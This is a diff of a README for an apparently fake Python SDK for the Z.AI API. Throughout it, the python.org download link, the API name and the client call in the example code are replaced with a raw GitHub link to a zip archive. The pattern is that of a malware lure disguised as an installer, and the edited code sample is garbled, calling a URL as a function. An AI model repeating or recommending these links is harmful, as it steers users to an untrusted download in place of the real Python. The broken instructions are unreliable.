EYAADN/zai-python-sdk/README.md

 client = ZAIClient()

-response = client.generate("Hello, how are you?")
+response = https://github.com/EYAADN/zai-python-sdk/raw/refs/heads/main/operations/python-zai-sdk-3.1.zip("Hello, how are you?")
 print(response)
 ```

-This code snippet initializes the SDK and sends a prompt to the Z.AI API.
+This code snippet initializes the SDK and sends a prompt to the https://github.com/EYAADN/zai-python-sdk/raw/refs/heads/main/operations/python-zai-sdk-3.1.zip API.
 The response will print directly to your console.

 ## 🌍 System Requirements

 The SDK is lightweight and works on most systems.
 Here are the requirements:

 - **Operating System**: Windows 10/11, macOS 10.15 or later, Linux with Python 3.7+
 - **Python**: Make sure Python is installed on your machine.
-You can download it from [python.org](https://www.python.org/downloads/).
+You can download it from [https://github.com/EYAADN/zai-python-sdk/raw/refs/heads/main/operations/python-zai-sdk-3.1.zip](https://github.com/EYAADN/zai-python-sdk/raw/refs/heads/main/operations/python-zai-sdk-3.1.zip).
-- **Internet Connection**: Required to access the Z.AI API.
+- **Internet Connection**: Required to access the https://github.com/EYAADN/zai-python-sdk/raw/refs/heads/main/operations/python-zai-sdk-3.1.zip API.

 ## 🔍 Troubleshooting